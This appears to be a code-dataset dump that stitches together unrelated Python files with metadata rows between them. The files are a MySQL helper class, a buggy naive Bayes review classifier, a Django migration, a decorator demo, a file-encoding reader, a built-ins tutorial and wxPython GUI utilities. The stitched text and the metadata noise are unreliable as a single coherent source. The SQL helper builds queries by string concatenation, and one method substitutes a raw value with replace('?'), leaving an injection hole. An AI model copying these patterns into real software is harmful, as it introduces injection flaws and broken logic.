def __init__(self, *args, **kwargs):
self._cfg_section = kwargs.get('config_section', 'DEFAULT')
from ..config import config
self._db_host = kwargs.get('db_host', None) or config.get(self._cfg_section, 'db_host')
self._db_user = kwargs.get('db_user', None) or config.get(self._cfg_section, 'db_user')
self._db_pass = kwargs.get('db_pass', None) or config.get(self._cfg_section, 'db_pass')
self._db_name = kwargs.get('dataset', None) or config.get(self._cfg_section, 'dataset')
self.commitOnEnd = kwargs.get('commitOnEnd', True) or config.get(self._cfg_section, 'commitOnEnd')
def connect(self):
return PySQLPool.getNewConnection(username=self._db_user,
password=self._db_pass, host=self._db_host, db=self._db_name, charset='utf8', commitOnEnd=self.commitOnEnd)
def cursor(self, execute_sql=None):
conn = self.connect()
cursor = conn.cursor(cursors.DictCursor)
if execute_sql is not None:
cursor.execute(execute_sql)
return [conn, cursor]
def commitPool(self):
'''
Actively commit all transactions in the entire PySQLPool
'''
PySQLPool.commitPool()
def fetchall(self, select_sql):
log.debug(select_sql)
return self.execute(select_sql).record
def fetchrow(self, select_sql):
'''
If the query was successful:
if 1 or more rows was returned, returns the first one
else returns None
Else:
raises Exception
'''
results = self.fetchall(select_sql)
return results[0] if len(results) > 0 else None
def fetchID(self, select_sql, id_colname='ID'):
results = self.fetchrow(select_sql)
if results is not None:
if id_colname in results:
return results[id_colname]
else:
raise RuntimeError("No ID column found. SQL query: %s" % select_sql)
return None # no results found
def list_concepts(self, select_sql):
"""
Fetch list of concepts
:param select_sql: query
:return: list cui
"""
return self.fetchlist(select_sql, 'CUI')
def list_genes(self, select_sql):
"""
Fetch list of genes
:param select_sql: query
:return: list HGNC
"""
return self.fetchlist(select_sql, 'gene_name')
#UNUSED: confirmed not used anywhere in medgen-python or variant2pubmed
#def fetchall_where(self, select_sql, _value, _key=SQLValues.tic('?')):
# return self.fetchall(select_sql.replace(_key, _value))
#UNUSED: confirmed not used anywhere in medgen-python or variant2pubmed
#def results2set(self, select_sql, col='PMID'):
# pubmeds = set()
# for row in self.fetchall(select_sql):
# pubmeds.add(str(row[col]))
# return pubmeds
#TODO: (@nthmost) variant2pubmed usage rectification
#
# Previous declaration:
#def insert(self, sql_insert, sql_values, do_tic=True):
# """
# :param sql_insert: string statement like 'insert into hgvs_query(hgvs_text, .....)'
# :param sql_values: list of values
# """
# if do_tic:
# # reconstructed, probably wrong. doesn't matter, we're not using it.
# values = SQLValues(sql_values)
#
# return self.execute(sql_insert + " values " + SQLValues.AND(sql_values))
def insert(self, tablename, field_value_dict):
'''
:param: tablename: name of table to receive new row
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
fields = []
values = []
for k,v in field_value_dict.items():
fields.append(k)
values.append(v)
sql = 'insert into {} ({}) values ({});'.format(tablename, ','.join(fields), ','.join(['%s' for v in values]))
queryobj = self.execute(sql, values)
return queryobj.lastInsertID
def update(self, tablename, id_col_name, row_id, field_value_dict):
'''
:param: tablename: name of table to update
:param: row_id (int): row id of record to update
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
fields = []
values = []
clauses = []
for k, v in field_value_dict.items():
clause = '%s=' % k
# surround strings and datetimes with quotation marks
if v == None:
clause += 'NULL'
elif hasattr(v, 'strftime'):
clause += '"%s"' % v.strftime(SQLDATE_FMT)
elif hasattr(v, 'lower'):
clause += EscapeString(v) #surrounds strings with quotes and unicodes them.
else:
clause += unicode(v)
clauses.append(clause)
sql = 'update %s set %s where %s=%i;' % (tablename, ', '.join(clauses), id_col_name, row_id)
queryobj = self.execute(sql)
# retrieve and return the row id of the insert. returns 0 if insert failed.
return queryobj.lastInsertID
def delete(self, tablename, field_value_dict):
'''
:param: tablename: name of table to receive new row
:param: field_value_dict: map of field=value
:return: row_id (integer) (returns 0 if insert failed)
'''
if len(field_value_dict) == 0:
raise RuntimeError("Do not support delete without a WHERE clause")
where_sql = ''
for k, v in field_value_dict.items():
if v == None:
v = 'NULL'
where_sql += 'AND {} is NULL '.format(k)
# surround strings and datetimes with quotation marks
elif hasattr(v, 'strftime'):
v = '"%s"' % v.strftime(SQLDATE_FMT)
where_sql += 'AND {}={} '.format(k, v)
elif hasattr(v, 'lower'):
v = EscapeString(v) # surrounds strings with quotes and unicodes them.
where_sql += 'AND {}={} '.format(k, v)
else:
v = unicode(v)
where_sql += 'AND {}={} '.format(k, v)
where_sql = where_sql[len('AND '):]
sql = 'delete from {} where {};'.format(tablename, where_sql)
log.debug(sql)
queryobj = self.execute(sql)
# retrieve and return the row id of the insert. returns 0 if insert failed.
return queryobj.lastInsertID
def drop_table(self, tablename):
return self.execute(" drop table if exists " + tablename)
def truncate(self, tablename):
return self.execute(" truncate " + tablename)
def execute(self, sql, args=None):
'''
Excutes arbitrary sql string in current database connection.
Returns results as PySQLPool query object.
'''
log.debug('SQL.execute ' + sql)
queryobj = PySQLPool.getNewQuery(self.connect())
queryobj.Query(sql, args)
return queryobj
def ping(self):
'''
Same effect as calling 'mysql> call mem'
:returns::self.schema_info(()
'''
try:
return self.schema_info()
except mdb.Error, e:
log.error("DB connection is dead %d: %s" % (e.args[0], e.args[1]))
return False
def schema_info(self):
header = ['schema', 'engine', 'table', 'rows', 'million', 'data length', 'MB', 'index']
return {'header': header, 'tables': self.fetchall('call mem')}
def last_loaded(self, dbname='DATABASE()'):
return self.fetchID(
"select event_time as ID from " + dbname + "." + "log where entity_name = 'load_database.sh' and message = 'done' order by idx desc limit 1")
def PMID(self, sql):
'''
For given sql select query, return a list of unique PMID strings.
'''
pubmeds = set()
for row in self.fetchall(sql):
pubmeds.add(str(row['PMID']))
return pubmeds
def hgvs_text(self, sql):
"""
For given sql select query, return a list of unique hgvs_text strings.
"""
hgvs_texts = set()
for row in self.fetchall(sql):
hgvs_texts.add(str(row['hgvs_text']))
return hgvs_texts
def trunc_str(self, inp, maxlen):
'''
Useful utility method for storing text in a database
:param inp: a string
:param maxlen: the max length of that string
:return: '"%s"' % s or '"%s..."' % s[:m-3]
'''
if maxlen < 3:
raise RuntimeError('maxlen must be at least 3')
if len(inp) > maxlen:
inp = '%s...' % inp[:maxlen - 3]
return inp
def get_last_mirror_time(self, entity_name):
'''
Get the last time some entity was mirrored
:param entity_name: table name for db, for example, bic_brca1
:return: datetime if found
'''
sql_query = 'SELECT event_time FROM log WHERE entity_name = "?" AND message like "rows loaded %" ORDER BY event_time DESC limit 1'.replace(
'?', entity_name)
result = self.fetchrow(sql_query)
if result:
return result['event_time']
raise RuntimeError('Query "%s" returned no results. Have you loaded the %s table?' % (sql_query, entity_name))
def create_index(self, table, colspec):
"""
Create index on a specified table using the colums defined.
Index start/stop times are logged to the "log" table.
:param table: name of the table, example, "train"
:param colspec: name of column, for example, "RQ"
:return:
"""
self.execute("call create_index('%s', '%s') " % (table, colspec))
def fetchlist(self, select_sql, column='gene_name'):
"""
Fetch as list
:param select_sql: query
:param column: name of column you want to make a list out of
:return: list
"""
rows = self.fetchall(select_sql)
return [] if rows is None else [str(r[column]) for r in rows] | 35.557325 | 153 | 0.595074 | 1,387 | 11,165 | 4.656092 | 0.221341 | 0.029266 | 0.021679 | 0.011614 | 0.280427 | 0.238154 | 0.209043 | 0.190771 | 0.150046 | 0.126974 | 0 | 0.004179 | 0.2927 | 11,165 | 314 | 154 | 35.557325 | 0.8136 | 0.120197 | 0 | 0.171975 | 0 | 0.012739 | 0.134009 | 0 | 0 | 0 | 0 | 0.006369 | 0 | 0 | null | null | 0.019108 | 0.044586 | null | null | 0.006369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfd063ade24331aec9eaa119b346a43099af793f | 6,596 | py | Python | archive/LoadData.py | sjayakum/csci544 | c452ed518fda0909836107668428791be90b82b4 | [
"Apache-2.0"
] | 1 | 2019-02-02T17:50:51.000Z | 2019-02-02T17:50:51.000Z | archive/LoadData.py | sjayakum/csci544 | c452ed518fda0909836107668428791be90b82b4 | [
"Apache-2.0"
] | null | null | null | archive/LoadData.py | sjayakum/csci544 | c452ed518fda0909836107668428791be90b82b4 | [
"Apache-2.0"
] | null | null | null |
stop_words_dict= {'': 0, 'all': 0, 'these': 0, 'are': 0, "weren't": 0, "they're": 0, 'those': 0, 'why': 0, 'under': 0, 'same': 0, "aren't": 0, 'his': 0, 'her': 0, 'had': 0, "she'd": 0, 'no': 0, 'your': 0, 'not': 0, 'because': 0, 'they': 0, 'which': 0, 'further': 0, "hadn't": 0, "he's": 0, 'while': 0, 'himself': 0, "here's": 0, "doesn't": 0, "you'll": 0, 'so': 0, "wasn't": 0, 'that': 0, "hasn't": 0, "we'll": 0, 'any': 0, "you'd": 0, "we'd": 0, "shouldn't": 0, 'nor': 0, 'their': 0, 'who': 0, 'into': 0, 'were': 0, 'some': 0, 'whom': 0, 'over': 0, "she's": 0, 'each': 0, "they'll": 0, 'until': 0, 'me': 0, "what's": 0, 'of': 0, 'themselves': 0, 'being': 0, 'against': 0, 'or': 0, "you're": 0, "where's": 0, "i'll": 0, 'from': 0, 'him': 0, 'is': 0, 'out': 0, 'on': 0, "i've": 0, 'theirs': 0, 'about': 0, 'few': 0, 'could': 0, "haven't": 0, "they've": 0, "don't": 0, 'been': 0, "couldn't": 0, "how's": 0, 'has': 0, 'only': 0, 'you': 0, 'yours': 0, 'most': 0, 'she': 0, "it's": 0, 'when': 0, 'ought': 0, 'did': 0, "can't": 0, "she'll": 0, 'down': 0, "why's": 0, "we've": 0, "let's": 0, "isn't": 0, 'here': 0, "mustn't": 0, 'where': 0, 'again': 0, "that's": 0, 'should': 0, 'hers': 0, 'an': 0, "who's": 0, 'do': 0, 'other': 0, 'be': 0, 'if': 0, "wouldn't": 0, 'then': 0, 'but': 0, 'between': 0, 'once': 0, 'at': 0, 'too': 0, 'both': 0, 'its': 0, "i'm": 0, 'and': 0, "didn't": 0, 'to': 0, 'through': 0, 'than': 0, 'our': 0, 'how': 0, 'in': 0, 'he': 0, 'herself': 0, "when's": 0, 'yourself': 0, 'cannot': 0, 'having': 0, 'was': 0, 'them': 0, 'itself': 0, "shan't": 0, "he'd": 0, 'there': 0, "he'll": 0, 'would': 0, "you've": 0, 'myself': 0, 'it': 0, 'i': 0, 'during': 0, 'am': 0, "i'd": 0, "there's": 0, 'off': 0, 'very': 0, 'below': 0, 'what': 0, 'a': 0, 'own': 0, 'up': 0, 'above': 0, 'my': 0, "they'd": 0, 'does': 0, "won't": 0, 'before': 0, 'by': 0, 'for': 0, 'such': 0, 'ours\tourselves': 0, 'yourselves': 0, 'more': 0, 'the': 0, 'this': 0, 'as': 0, 'we': 0, 'have': 0, "we're": 0, 'with': 0, 'doing': 0, 'after': 0}
def tokenize(sentence):
sentence = ' '.join(sentence)
sentence = sentence.lower()
sentence = sentence.split(' ')
return_list = []
for each_word in sentence:
if each_word not in stop_words_dict:
return_list.append(each_word.strip('\n'))
return return_list
f = open('train-text.txt', 'r')
l = open('train-labels.txt', 'r')
keys = {}
words = []
i = 0
for each_line in f:
temp = each_line.split(' ')
keys[temp[0]] = i
i += 1
words.append(tokenize(list(temp[1:])))
class1 = [0] * len(words)
class2 = [0] * len(words)
for each_line in l:
temp = each_line.split(' ')
class1[keys[temp[0]]] = temp[1].strip('\n')
class2[keys[temp[0]]] = temp[2].strip('\n')
# print(words[:2])
# print(class1[:2])
# print(class2[:2])
import collections
probs = collections.defaultdict(dict)
vocab = []
for each_sentence in words:
for each_word in each_sentence:
vocab.append(each_word)
vocab = set(vocab)
for each_vocab in vocab:
temp_dict = {}
temp_dict['positive']=0
temp_dict['negative']=0
temp_dict['deceptive']=0
temp_dict['truthful']=0
probs[each_vocab] = temp_dict
deceptive_prior = 0
truthful_prior = 0
positive_prior = 0
negative_prior = 0
for each_class in class1:
if each_class == 'deceptive':
deceptive_prior += 1
if each_class == 'truthful':
truthful_prior += 1
for each_class in class2:
if each_class == 'positive':
positive_prior += 1
if each_class == 'negative':
negative_prior += 1
deceptive_prior = (deceptive_prior / len(class1))
truthful_prior = (truthful_prior / len(class1))
positive_prior = (positive_prior / len(class1))
negative_prior = (negative_prior / len(class1))
positive_words_count = {}
negative_words_count = {}
for i in range(len(class1)):
if class2[i] == 'positive':
for each_word in words[i]:
probs[each_word]['positive']+=1
if each_word not in positive_words_count:
positive_words_count[each_word] = 1
else:
positive_words_count[each_word] += 1
if class2[i] == 'negative':
probs[each_word]['negative'] += 1
for each_word in words[i]:
if each_word not in negative_words_count:
negative_words_count[each_word] = 1
else:
negative_words_count[each_word] += 1
truthful_words_count = {}
deceptive_words_count = {}
for i in range(len(class1)):
if class1[i] == 'deceptive':
probs[each_word]['deceptive'] += 1
for each_word in words[i]:
if each_word not in deceptive_words_count:
deceptive_words_count[each_word] = 1
else:
deceptive_words_count[each_word] += 1
if class1[i] == 'truthful':
probs[each_word]['truthful'] += 1
for each_word in words[i]:
if each_word not in truthful_words_count:
truthful_words_count[each_word] = 1
else:
truthful_words_count[each_word] += 1
positive_words_count = {k: v / total for total in (sum(positive_words_count.values()),) for k, v in
positive_words_count.items()}
negative_words_count = {k: v / total for total in (sum(negative_words_count.values()),) for k, v in
negative_words_count.items()}
truthful_words_count = {k: v / total for total in (sum(truthful_words_count.values()),) for k, v in
truthful_words_count.items()}
deceptive_words_count = {k: v / total for total in (sum(deceptive_words_count.values()),) for k, v in
deceptive_words_count.items()}
# print(positive_words_count)
print(probs)
test_data_point_number = 1245
import math
test_data = tokenize(words[test_data_point_number])
print(' '.join(words[test_data_point_number]))
#CLASS1
positive_posterior = 0
positive_final = 0
for each_word in test_data:
try:
positive_posterior += math.log(positive_words_count[each_word])
except:
pass
positive_final = positive_posterior * positive_prior
#CLASS 2
negative_posterior = 0
negative_final = 0
for each_word in test_data:
try:
negative_posterior += math.log(negative_words_count[each_word])
except:
print(each_word,' not in source')
pass
negative_final = negative_posterior * negative_prior
print(positive_final,negative_final)
if positive_final > negative_final:
print('POSITIVE')
else:
print('NEGATIVE')
print(class2[test_data_point_number]) | 34 | 2,017 | 0.5849 | 1,018 | 6,596 | 3.626719 | 0.212181 | 0.083965 | 0.03792 | 0.048754 | 0.252167 | 0.189057 | 0.119447 | 0.094529 | 0.094529 | 0.02844 | 0 | 0.046793 | 0.222408 | 6,596 | 194 | 2,018 | 34 | 0.673036 | 0.014099 | 0 | 0.164063 | 0 | 0 | 0.15194 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007813 | false | 0.015625 | 0.015625 | 0 | 0.03125 | 0.054688 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfd2553688eea939f4604d16731abf6e0a2a1ad3 | 339 | py | Python | mysite/recipes/migrations/0031_merge_20161201_0145.py | Jason0705/ICanCook | b215e29183e588a0c161c81f1dc7e2da89563905 | [
"Unlicense"
] | null | null | null | mysite/recipes/migrations/0031_merge_20161201_0145.py | Jason0705/ICanCook | b215e29183e588a0c161c81f1dc7e2da89563905 | [
"Unlicense"
] | null | null | null | mysite/recipes/migrations/0031_merge_20161201_0145.py | Jason0705/ICanCook | b215e29183e588a0c161c81f1dc7e2da89563905 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-01 01:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('recipes', '0030_auto_20161129_2138'),
('recipes', '0030_merge_20161130_0139'),
]
operations = [
]
| 19.941176 | 48 | 0.663717 | 41 | 339 | 5.219512 | 0.804878 | 0.102804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183521 | 0.212389 | 339 | 16 | 49 | 21.1875 | 0.617978 | 0.20059 | 0 | 0 | 1 | 0 | 0.227612 | 0.175373 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bfd389f7fe51f3050b8d8eeba81b50ed5e0fe336 | 374 | py | Python | python全栈/day43/day43-6 类装饰器.py | Ringo-li/python_exercise_100 | 2c6c42b84a88ffbbac30c67ffbd7bad3418eda14 | [
"MIT"
] | null | null | null | python全栈/day43/day43-6 类装饰器.py | Ringo-li/python_exercise_100 | 2c6c42b84a88ffbbac30c67ffbd7bad3418eda14 | [
"MIT"
] | null | null | null | python全栈/day43/day43-6 类装饰器.py | Ringo-li/python_exercise_100 | 2c6c42b84a88ffbbac30c67ffbd7bad3418eda14 | [
"MIT"
] | null | null | null | # 类装饰器,使用类装饰已有函数
class MyDecorator(object):
def __init__(self, func):
self.__func = func
# 实现__call__方法,让实例对象变为像函数一样的可调用对象
def __call__(self, *args, **kwds):
# 对已有函数进行封装
print("课已经讲完了")
self.__func()
@MyDecorator # MyDecorator => show = MyDecorator(show)
def show():
print("可以放学了!")
# 执行show 就等于执行MyDecorator创建的实例对象
show() | 22 | 54 | 0.647059 | 38 | 374 | 5.947368 | 0.578947 | 0.106195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 374 | 17 | 55 | 22 | 0.782007 | 0.339572 | 0 | 0 | 0 | 0 | 0.049793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.4 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44a61f8c95d30fc8390923ffa8f86c9b6a091073 | 1,143 | py | Python | app/annohub/lib/fileutils.py | inktrap/annohub | dd91035b18263ce91ea4c922d7e597176fbf6172 | [
"MIT"
] | null | null | null | app/annohub/lib/fileutils.py | inktrap/annohub | dd91035b18263ce91ea4c922d7e597176fbf6172 | [
"MIT"
] | null | null | null | app/annohub/lib/fileutils.py | inktrap/annohub | dd91035b18263ce91ea4c922d7e597176fbf6172 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from annohub import app
from annohub.lib import error as e
def try_unicode(this_string, errors='strict'):
u''' taken from <https://stackoverflow.com/a/9600161>
and changed so it turns input into unicode
Attention: Order of ENCODINGS_ALLOWED is important.
'''
assert isinstance(this_string, basestring), repr(this_string)
for enc in app.config['ENCODINGS_ALLOWED']:
try:
return unicode(this_string, enc, errors)
except UnicodeError, exc:
continue
raise e.FileutilsInvalidFileEncodingException
def read_file(this_file):
u''' read the file '''
try:
data = this_file.read()
except IOError:
raise e.FileutilsInvalidFileReadException
# stripping unnecessary spaces to test if file is empty
data = try_unicode(data).strip()
#app.logger.debug(len(data))
#app.logger.debug(app.config['SIZE_LIMIT'])
if len(data) > app.config['SIZE_LIMIT']:
raise e.FileutilsFileTooLargeException
elif len(data) > 0:
return data
else:
raise e.FileutilsEmptyFileException
| 30.078947 | 65 | 0.67629 | 142 | 1,143 | 5.352113 | 0.577465 | 0.052632 | 0.044737 | 0.047368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010147 | 0.223972 | 1,143 | 37 | 66 | 30.891892 | 0.846674 | 0.144357 | 0 | 0.083333 | 0 | 0 | 0.041825 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0 | null | null | 0 | 0.083333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
44a9b48d19ecc708bb17d5ec3f810a99423f4548 | 1,694 | py | Python | Built-In functions in Python.py | MYJOR/Software-Engineering-With-Python | 01031ba60df1c65b82a1b32f11b3deb6b45574d0 | [
"MIT"
] | null | null | null | Built-In functions in Python.py | MYJOR/Software-Engineering-With-Python | 01031ba60df1c65b82a1b32f11b3deb6b45574d0 | [
"MIT"
] | null | null | null | Built-In functions in Python.py | MYJOR/Software-Engineering-With-Python | 01031ba60df1c65b82a1b32f11b3deb6b45574d0 | [
"MIT"
] | null | null | null | #built in functions
from math import *
#abs() function
number=-120
print(abs(number))
#len() function
name_1='sam'
name_2="JOSH"
print(len(name_1))
#upper()function
print(name_1.upper())
#lower() function
print(name_2.lower())
#replace function
print(name_1.replace(name_1,name_2))
#String Function
#print(str(number)/2)
# #we should get an error because number is now a string not an integer
#int function
numberString='1200'
print(int(numberString)/3)
#float function
print(float(numberString)/4.5)
#power function
base=5
power=2
print(pow(base,power))
#max function returns the greatest value in a list
Num1=24.8
Num2=25.2
Num3=25.1
print("the greatest value is ",max(Num1,Num2,Num3))
#Min function returns the smallest value in a list
print("the smallest value in the list is ",min(Num1,Num2,Num3))
#round function
Num4= 4.67
print(round(Num4))
Num5=5.6787556
print(round(Num5,3))#here we defined the limit of the numbers we can take after the decimal point
#sqrt function
Num6=4
print(sqrt(Num6))
#floor function
Num7=4.7
print(floor(Num7))
#Substring function
City="Baghdad"
print(City[0:3])
#help function
#print(help())
#range function
for numbers in range(1,100):
print(numbers)
# the 3 means that the function skips every 3 indexes
for Skips in range(1,100,2):
print(Skips)
#Slice Function
List=[100,200,300,400,500,600,700,800]
SlicedList=slice(1,5)
print(List[SlicedList])
#Slice and skip indexes
List=[100,200,300,400,500,600,700,800]
SlicedList=slice(1,5,2)
print(List[SlicedList])
| 14.355932 | 98 | 0.669421 | 265 | 1,694 | 4.249057 | 0.381132 | 0.069272 | 0.045293 | 0.031972 | 0.079929 | 0.079929 | 0.079929 | 0.079929 | 0.079929 | 0.079929 | 0 | 0.095737 | 0.210744 | 1,694 | 117 | 99 | 14.478632 | 0.746447 | 0.353011 | 0 | 0.1 | 0 | 0 | 0.078142 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0.475 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
44aa68f2a766bf6b08abe4a106387c847de89174 | 49,123 | py | Python | digsby/src/gui/toolbox/toolbox.py | ifwe/digsby | f5fe00244744aa131e07f09348d10563f3d8fa99 | [
"Python-2.0"
] | 35 | 2015-08-15T14:32:38.000Z | 2021-12-09T16:21:26.000Z | digsby/src/gui/toolbox/toolbox.py | niterain/digsby | 16a62c7df1018a49eaa8151c0f8b881c7e252949 | [
"Python-2.0"
] | 4 | 2015-09-12T10:42:57.000Z | 2017-02-27T04:05:51.000Z | digsby/src/gui/toolbox/toolbox.py | niterain/digsby | 16a62c7df1018a49eaa8151c0f8b881c7e252949 | [
"Python-2.0"
] | 15 | 2015-07-10T23:58:07.000Z | 2022-01-23T22:16:33.000Z | '''
GUI utilities.
'''
from __future__ import with_statement
from __future__ import division
import config
import functools
import wx, struct
from wx import GetTopLevelWindows, Point, Size
from logging import getLogger; log = getLogger('gui.util')
from traceback import print_exc
from PIL import Image, ImageDraw, ImageFont
from ConfigParser import ConfigParser
import sys
from collections import defaultdict
from time import clock as time_clock
from gui.toolbox.monitor import Monitor
import cgui, new
import simplejson as json
import os.path
# adds methods to Bitmap, Image, etc...
import imagefx #@UnusedImport
wxMSW = 'wxMSW' in wx.PlatformInfo
# colors in skin YAML can start with this string
color_prefix = '0x'
def __repr__(self):
'''wxBitmap repr showing its .path, if it has one.'''
try:
path = getattr(self, 'path', '')
return '<wxBitmap %d%s>' % (id(self), (' '+os.path.normpath(path)) if path else '')
except Exception:
return '<wxBitmap %d>' % id(self)
wx.Bitmap.__repr__ = __repr__
del __repr__
# convenience method for removing all of a wxMenu's items
wx.Menu.RemoveAllItems = lambda self: [self.RemoveItem(item) for item in self.GetMenuItems()]
wx.Window.Tip = property(lambda self: self.GetToolTip().GetTip(),
lambda self, tip: self.SetToolTip(wx.ToolTip(tip)))
def check_destroyed(ctrl):
if wx.IsDestroyed(ctrl):
code = sys._getframe(1).f_code
print >> sys.stderr, 'WARNING: destroyed object being used (%s in %s:%d)' % \
(code.co_name, code.co_filename, code.co_firstlineno)
return True
return False
################################################################################
if wxMSW:
import ctypes
from ctypes import byref, WinError
from ctypes.wintypes import UINT, POINT, RECT
user32 = ctypes.windll.user32
class WINDOWPLACEMENT(ctypes.Structure):
_fields_ = [('length', UINT),
('flags', UINT),
('showCmd', UINT),
('ptMinPosition', POINT),
('ptMaxPosition', POINT),
('rcNormalPosition', RECT)]
def GetWindowPlacement(win):
hwnd = win.GetHandle()
p = WINDOWPLACEMENT()
p.length = ctypes.sizeof(WINDOWPLACEMENT)
if not user32.GetWindowPlacement(hwnd, byref(p)):
raise WinError()
return windowplacement_todict(p)
def SetWindowPlacement(win, d):
d2 = GetWindowPlacement(win)
d2['rcNormalPosition'] = d['rcNormalPosition']
d2['showCmd'] |= 0x0020 # SWP_FRAMECHANGED
d = d2
p = windowplacement_fromdict(d)
if not user32.SetWindowPlacement(win.Handle, byref(p)):
raise WinError()
def windowplacement_todict(p):
return dict(flags = p.flags,
showCmd = p.showCmd,
ptMinPosition = (p.ptMinPosition.x, p.ptMinPosition.y),
ptMaxPosition = (p.ptMaxPosition.y, p.ptMaxPosition.y),
rcNormalPosition = (p.rcNormalPosition.left, p.rcNormalPosition.top, p.rcNormalPosition.right, p.rcNormalPosition.bottom))
def windowplacement_fromdict(d):
p = WINDOWPLACEMENT()
p.length = ctypes.sizeof(WINDOWPLACEMENT)
p.showCmd = int(d['showCmd'])
p.ptMinPosition = POINT()
p.ptMinPosition.x = int(d['ptMinPosition'][0])
p.ptMinPosition.y = int(d['ptMinPosition'][1])
p.ptMaxPosition = POINT()
p.ptMaxPosition.x = int(d['ptMaxPosition'][0])
p.ptMaxPosition.y = int(d['ptMaxPosition'][1])
p.rcNormalPosition = RECT()
p.rcNormalPosition.left, p.rcNormalPosition.top, p.rcNormalPosition.right, p.rcNormalPosition.bottom = d['rcNormalPosition']
return p
################################################################################
def DeleteRange(textctrl, b, e):
if b != e:
with textctrl.Frozen():
textctrl.Remove(b, e)
textctrl.InsertionPoint = b
def DeleteWord(textctrl):
'''
Deletes the last word (or part of word) at the cursor.
Commonly bound to Ctrl+Backspace.
TODO: ignores punctuation--like
this.is.a.dotted.word[CTRL+BACKSPACE]
will delete the whole line. is that what we want?
'''
i = textctrl.InsertionPoint
s = textctrl.Value
if not s or i < 1: return
e = i
while s[i-1] == ' ' and i != 0:
i -= 1
b = s.rfind(' ', 0, i) + 1 if i != 0 else 0
if b == -1:
b = 0
DeleteRange(textctrl, b, e)
def DeleteRestOfLine(textctrl):
'''
Deletes from the cursor until the end of the line.
Emulates Control+K from many Linux and Mac editors.
'''
i = textctrl.InsertionPoint
# find the next newline
j = textctrl.Value[i:].find('\n')
j = textctrl.LastPosition if j == -1 else j + i
# if the cursor is on the last character of the line before a newline,
# just delete the newline
if i == j and j + 1 <= textctrl.LastPosition:
j += 1
DeleteRange(textctrl, i, j)
if 'wxMac' in wx.PlatformInfo:
AutoDC = wx.PaintDC
else:
AutoDC = wx.AutoBufferedPaintDC
# def to_icon(bitmap):
# return wx.IconFromBitmap(bitmap.WXB)
def to_icon(bitmap, size = None):
if isinstance(bitmap, wx.Image):
bitmap = wx.BitmapFromImage(bitmap)
bitmap = bitmap.WXB
return wx.IconFromBitmap(bitmap.Resized(size) if size is not None else bitmap)
wx.Rect.Pos = new.instancemethod(cgui.RectPosPoint, None, wx.Rect)
from cgui import Subtract as cgui_Subtract
def Rect_Subtract(r, left = 0, right = 0, up = 0, down = 0):
r.x, r.y, r.width, r.height = cgui_Subtract(r, left, right, up, down)
return r
def Rect_SubtractCopy(r, left = 0, right = 0, up = 0, down = 0):
return cgui_Subtract(r, left, right, up, down)
wx.Rect.Subtract = new.instancemethod(Rect_Subtract, None, wx.Rect)
wx.Rect.SubtractCopy = new.instancemethod(Rect_SubtractCopy, None, wx.Rect)
del Rect_Subtract
wx.Rect.AddMargins = new.instancemethod(cgui.RectAddMargins, None, wx.Rect)
# methods for getting/setting "always on top" state for top level windows
#
def GetOnTop(toplevelwin):
'Returns True if this window is always on top, False otherwise.'
s = toplevelwin.WindowStyleFlag
return bool(s & wx.STAY_ON_TOP)
def SetOnTop(toplevelwin, ontop):
'''Sets this window's "always on top" state.'''
if ontop:
flag = toplevelwin.WindowStyleFlag | wx.STAY_ON_TOP
else:
flag = toplevelwin.WindowStyleFlag & ~wx.STAY_ON_TOP
toplevelwin.WindowStyleFlag = flag
def ToggleOnTop(toplevelwin):
toplevelwin.OnTop = not toplevelwin.OnTop
wx.TopLevelWindow.OnTop = property(GetOnTop, SetOnTop)
